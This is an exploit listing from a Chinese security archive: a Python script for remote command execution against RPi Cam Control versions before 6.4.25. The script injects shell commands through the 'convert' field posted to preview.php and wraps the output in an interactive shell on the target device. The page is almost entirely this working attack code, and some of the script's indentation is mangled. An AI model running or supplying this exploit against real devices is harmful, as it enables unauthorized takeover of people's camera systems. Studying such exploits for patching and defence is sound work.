RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution

来源：vfocus.net 作者：Shells 发布时间：2018-09-11

#!/usr/bin/python

import sys
import requests
import os
import re
import readline

def usage():

    print "\nRPi Cam Web Interface Exploit\n"
    print "Usage: %s http://host/path/to/preview.php \n" % sys.argv[0]
    print "Options: "
    print " -h, --help              Show this help message and exit"
    print ""
    sys.exit(0)

def execute_command(url, cmd):

    split = "---a97a13f9f48c65c72e4802fc1e516e3f---"
    convert = ".) >/dev/null 2>&1; (" + cmd + ") 2>&1; echo " + split + ";#aaaaaaa"
    convertCmd = "/usr/bin/ffmpeg -f image2 -i i_%05d.jpg"
    data = {"convert":convert,"convertCmd":convertCmd}
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}

    try:
        r = requests.post(url, headers=headers, data=data, verify=False)
        if r.status_code == 200:
            if len(r.content) > 0 and split in r.content:
                return r.content.split(split)[0]
            else:
                return ""
        else:
            print "\n[*] Error: Received HTTP Status " + str(r.status_code) + "\n"
            return ""
    except requests.ConnectionError as e:
        print "\n[*] Error: An error occurred while connecting to the host.\n"
        exit(1)
    except requests.exceptions.RequestException as e:
        print "\n[*] Error: Something unexpected happened.\n"
        print e
        exit(1)

def main():

    if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
        usage()

    url = sys.argv[1]

    print "\nRPi Cam Web Interface Exploit"

    print "\n[*] Attempting exploit on:"
    print "    " + url

    username = execute_command(url,"whoami").strip()
    if len(username) == 0:
        exit(1)

    hostname = execute_command(url, "hostname").strip()

    path = execute_command(url, "pwd").strip()

    print "\n[*] Returning prompt!\n"

    try:
        while True:
            prompt = username + "@" + hostname + ":" + path + "$ "
            cmd = raw_input(prompt)
            if cmd == "exit":
                print "\n[*] Goodbye!\n"
                return
                        elif cmd.startswith("cd "):
                                chars = set(";&|")
                if any((c in chars) for c in cmd):
                    print "[*] This shell only supports cd as a standalone command."
                else:
                    cmd = cmd.split()
                    tmpPath = " ".join(cmd[1:])
                    if tmpPath == "..":
                        if len(path.split("/")) > 2:
                            tmpPath = "/".join(path.split("/")[:-1])
                        else:
                            tmpPath = "/"
                    cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
                    tmpPath = execute_command(url,cmd).strip()
                    if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
                        path = tmpPath
                    else:
                        print tmpPath.split('\n')[0]
            elif cmd == "clear":
                os.system("clear")
            else:
                cmd = "cd " + path + " && " + cmd
                results = execute_command(url, cmd)
                if len(results) != 0:
                    print results

    except KeyboardInterrupt:
        print "\n\n[*] Goodbye!\n"
        return

if __name__ == "__main__":
    main()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告